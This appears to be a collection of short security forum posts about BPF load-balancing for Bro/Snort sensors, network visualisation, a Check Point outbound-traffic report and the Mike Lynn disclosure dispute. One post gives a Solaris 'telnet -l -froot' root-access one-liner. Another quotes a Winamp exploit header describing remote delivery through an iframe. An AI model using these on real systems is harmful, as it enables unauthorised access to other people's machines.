Bookmarked for future reference. I had been thinking about a way to "load balance" traffic across multiple Snort instances and thought about applying something like Cisco's etherchannel load-balance srt-dst-ip hashing algorithm.

Lo and behold, I found this great BPF kludge!

In our example, there will be four nodes monitoring traffic, so the BPF looks like this for the first node:
(ip[14:2]+ip[18:2]) - (4*((ip[14:2]+ip[18:2])/4)) == 0
So, in /etc/bro/local.bro, we have this:
redef cmd_line_bpf_filter="(ip[14:2]+ip[18:2]) - (4*((ip[14:2]+ip[18:2])/4)) == 0";
On the second node, we would have this:
redef cmd_line_bpf_filter="(ip[14:2]+ip[18:2]) - (4*((ip[14:2]+ip[18:2])/4)) == 1";
Third:
redef cmd_line_bpf_filter="(ip[14:2]+ip[18:2]) - (4*((ip[14:2]+ip[18:2])/4)) == 2";
And fourth:
redef cmd_line_bpf_filter="(ip[14:2]+ip[18:2]) - (4*((ip[14:2]+ip[18:2])/4)) == 3";

Special note: If you are monitoring a link that is still vlan tagged (like from an RSPAN), then you will need to stick vlan && in front of each of the BPF's.

Multi-node Bro Cluster Setup

Good blog about tying together tools like Bro, CIF, ELSA, Sphinx, etc. to do security analysis on a shoestring budget.

Open-Source Security Tools

Decius wrote:

noteworthy wrote:
Things that make you go "hmmm..."

This is an advance notification of an out-of-band security bulletin that Microsoft is intending to release on October 23, 2008.

If you haven't seen it, Microsoft has just recently started publishing an immense amount of technical detail about these vulnerabilities. Look here and here.

Good reverse here:

http://www.dontstuffbeansupyournose.com/?p=35

RE: Microsoft Security Bulletin Advance Notification for October 2008

First there was The Spinning Cube of Potential Doom. Then, there was the GPL Cube of Potential Doom. Someone else has a much more improved version now:

InetVis has several features to explore network traffic and assist the formation of insight. A set of key features are listed below:

* Adjustable replay position to seek through the traffic capture files.
* Variable playback speed (time scaling), from as slow as 0.001x (1 ms/s), or as fast as 86400x (1 day/s).
* Variable time frame/window to view events for the past 100 ms up to 5 years.
* Transparent decay of events - points fade as they age (with respect to the time window).
* New events are highlighted by pulsing once (a momentarily bulge of the point).
* Filtering capability via BPF filter expressions (as used in libpcap and tcpdump).
* Various colour schemes for colouring points and adjustable point size.
* Setting the data ranges and scaling down into sub-domain IP addresses (destination and source) as well as port ranges to view a subset of the traffic data.
* Adjustable logarithmic plot for stretching out lower port range where, in general, most TCP/UDP traffic occurs.
* Various reference frame controls, i.e. toggling visibility of axes, markers, transparent grid lines, labels, and background colour.
* Orthographic and perspective projection modes.
* Immersive navigation - scaling (zooming), translating (moving) and rotating.
* Record single snapshot image, or dump all image frames (useful for manually encoding video clips).
* Record output back to pcap binary file format, for further detailed analysis with other applications (e.g. tcpdump, Ethereal and Snort).

InetVis -- 3-D scatter-plot visualization for network traffic

Large title tag does the trick.

Google Chrome "Save As" Function Buffer Overflow

Telnet -l "-froot" will get you root on most solaris 10/11 with default configs.

0-Day in Solaris 10 and 11

Decius wrote:

In its long evolution, Windows has grown so complicated that it is harder to secure. Well these images make the point very well. Both images are a complete map of the system calls that occur when a web server serves up a single page of html with a single picture. The same page and picture.

Which one do you think is Windows?

I guessed the one on the right, looks like I won the prize! I'm curious about details of the grapher's methodology. IIS comes out of the box with a lot of bells and whistles turned on by default. Apache is relatively bare in the same state. If the same diagrams were generated with all unnecessary functionality in each package disabled, I wonder if the IIS diagram would become more tidy.

[Update: I meant the left.]

RE: Why Windows is less secure than Linux | Threat Chaos | ZDNet.com

There's a blurb on the SANS handler's diary about a report of packets leaving a freshly built Check Point firewall. I wonder if this will turn out to be a hoax.

There were rumors long ago that the NSA found an IP address in Check Point code, presumably an artifact of unremoved debug code. If this new report turns out verifiable, I wonder how much truth those past rumors may have had after all.

Surreptitious phone home, faulty debugging, or hoax?

...

Published: 2006-02-10,
Last Updated: 2006-02-10 22:24:05 UTC by Lorna Hutcheson (Version: 1)

One of our readers, Jeff Peterson, submitted to us a packet capture that was coming from a newly built Checkpoint Firewall, Build 244 . Here is what he observed in his own words:

"This file is from a freshly installed Checkpoint Firewall 1 VPN gateway. This machine was off-line until installation was completed and policy pushed.

Once the service starts and the first login attempt is completed the interface of the machine starts blasting the captured information to two targeted destination IP's.....Installation is from a Checkpoint supplied CD."

I did ask about the base OS being a fresh install and here are his comments as well:

"Yes. In fact I've built the server twice from scratch using only the checkpoint supplied CD which includes the OS and Firewall. Ie: SecurePlatform. The outcome was the same both times"

Here is a short synopsis of the traffic being observed:

There are 4 UDP packets being sent to one IP address then switching to the other and sending 4 more. This repeats itself over and over. The one IP 48.28.223.239 doesn't appear to have anything assigned to it but belongs to Prudential Securities Inc. The other IP 152.96.109.99 belongs to:

descr: HSR Hochschule fuer Technik Rapperswil
descr: Rapperswil, Switzerland

Dst Port is 57327/UDP
Src port is 32768

If you would like to see two example packets, you can view them here:
http://isc.sans.org/diaryimages/packets for checkpoint.txt

The issue went away with new CDs being obtained from the vendor.

This is the only report we received about this so far. If you have observed similar traffic or have any ideas, please let us know.

Check Point Outbound Traffic Mystery

/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Duble click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotly,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/

Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day 2006-01-29)

Wired has done a great interview with Mike. It should clear up a number of the questions people have had with recent events.

I would like to specifically point out one part of this interview:

WN: So ISS knew the seriousness of the bug.

Lynn: Yes, they did. In fact, at one point ... they apparently didn't get it, and they actually wanted to distribute the full working exploit very widely inside the company.... I was told ... "Give this to all the sales engineers and to all the pen testers."

WN: Why would they want you to do that?

Lynn: Well, because it bruises Cisco, remember? Mind you, this was something that Cisco hadn’t gone public with yet and that's not useful to pen testers because what do they advise their customers to do (to protect themselves if no information about the vulnerability has been released yet)?

I told them, "You do realize if you do that, it's going to leak?" And (one of the ISS guys) says, "That's Cisco's problem." And then (another ISS guy) turns to me and says that they need to understand this could be their Witty worm. I was like, Whoa, what meeting did I walk into?

(The Witty worm was a particularly aggressive and destructive code released by someone last year that targeted computer systems running a security program made by Internet Security Systems and even more specifically targeted military bases using the software. It infected more than 12,000 servers and computer systems in about an hour. Because of the worm's speed in spreading and its creators' apparent knowledge of who ISS' customers were, some security experts speculated that someone working for or connected to ISS might have been responsible for writing and releasing it.)

At that point, I told them all no, and they fought it and I resigned right there on the spot. And this was about a month ago.

I thought they were handling this in a non-ethical manner. Because it was just way too fast and loose with who can see this.... I mean, I don't even want people to see it now. (ISS talked him out of the resignation by agreeing to give him control over who could see or have the exploit.)

All I can say is WOW. A big "wow". Caps, bold, and feeling.

Anyone who says that Mike is not on the level needs to reference this. This says truly horrible things about ISS. This should cost them some serious reputation capitol.

One thing that Mike did a great job of in this interview is getting the idea out that in order to defeat the "bad guys", you must run faster then them. It is the only option.

Case in point, via the Wall Street Journal:

"The vulnerabilities are out there on the Net in full broadcast mode," said Gilman Louie, a tech-industry veteran who heads In-Q-Tel, a venture-capital firm backed by the Central Intelligence Agency. "The bad guys get to it faster than everybody else. I'd rather have disclosure and let everybody respond."

Disclosure is a great thing, but it must be done properly. I would argue that Mike did it properly. I would argue that he has displayed the best kind of ethics through this entire mess. Given the content of this Wired interview, I would argue that ISS has its head up its ass.

Router Flaw Is a Ticking Bomb | Mike Lynn Has Integrity^3